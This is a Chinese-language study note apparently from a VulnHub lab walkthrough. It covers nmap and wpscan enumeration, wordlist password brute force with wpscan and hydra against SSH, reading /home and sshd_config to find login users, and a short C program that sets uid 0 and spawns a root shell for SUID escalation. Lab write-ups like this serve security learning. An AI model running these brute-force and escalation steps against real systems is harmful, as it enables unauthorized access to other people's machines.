vunhub 靶机之旅-1

youtube视频:
https://www.youtube.com/watch?v=SerBliNAh1k

nmap
-A 同时打开操作系统指纹和版本检测

wpscan --url 查找 -e enumerate 列举 --enumerate u列举用户
Examples :

帮助
-Further help …
ruby ./wpscan.rb --help
做“非侵入性”检查
-Do ‘non-intrusive’ checks …
ruby ./wpscan.rb --url www.example.com
使用50个线程对枚举的用户做单词列表密码蛮力…
-Do wordlist password brute force on enumerated users using 50 threads …
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
做单词表密码蛮力上的“管理员”用户名只…
-Do wordlist password brute force on the ‘admin’ username only …
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
枚举安装的插件…
-Enumerate installed plugins …
ruby ./wpscan.rb --url www.example.com --enumerate p
枚举安装的主题
-Enumerate installed themes …
ruby ./wpscan.rb --url www.example.com --enumerate t
枚举用户
-Enumerate users …
ruby ./wpscan.rb --url www.example.com --enumerate u
枚举安装的TimTrBBS
-Enumerate installed timthumbs …
ruby ./wpscan.rb --url www.example.com --enumerate tt
使用HTTP代理
-Use a HTTP proxy …
ruby ./wpscan.rb --url www.example.com --proxy 127.0.0.1:8118
使用SoCKS5代理
-Use a SOCKS5 proxy … (cURL >= v7.21.7 needed)
ruby ./wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000
使用自定义内容目录
-Use custom content directory …
ruby ./wpscan.rb -u www.example.com --wp-content-dir custom-content
使用自定义插件目录
-Use custom plugins directory …
ruby ./wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins
更新数据库
-Update the DB …
ruby ./wpscan.rb --update
调试输出
-Debug output …
ruby ./wpscan.rb --url www.example.com --debug-output 2>debug.log

See README for further information.

先去/home 目录 看用户
再去 /etc/ssh 看 sshd_config
得到 可以ssh的用户

ssh id@localhost
hydra 使用方法:https://www.cnblogs.com/ECJTUACM-873284962/p/7805116.html

hydra -l anne -p /usr/share/wordlists/nmap.lst ssh://192.168.247.128
ip + 服务
-s 指定端口
-l 指定用户
-L 指定用户字典
-p 指定密码破解
-P 指定密码字典(文件)

SUID提权 文章:https://www.cnblogs.com/hookjoy/p/6612595.html
#include
#include
int main (void){
seteuid(0);
setegid(0);
system("/bin/bash -p");
return 0;
}
gcc -o hello hello.c

编译后运行,暂时提权
sudo ./hello

:从最开始的FTP 端口的匿名用户进去的,主站是worldpress,进行SSH的爆破 得到密码,查找得到某些用户不能密码登陆。
最后SUID 提权

收获:简单实用nmap,wpscan,ftp命令,hydra 爆破 SUID 提权 /home目录与 /etc/ssh的sshd_config 对比 得确切用户

你可能感兴趣的:(自我提升,安全学习)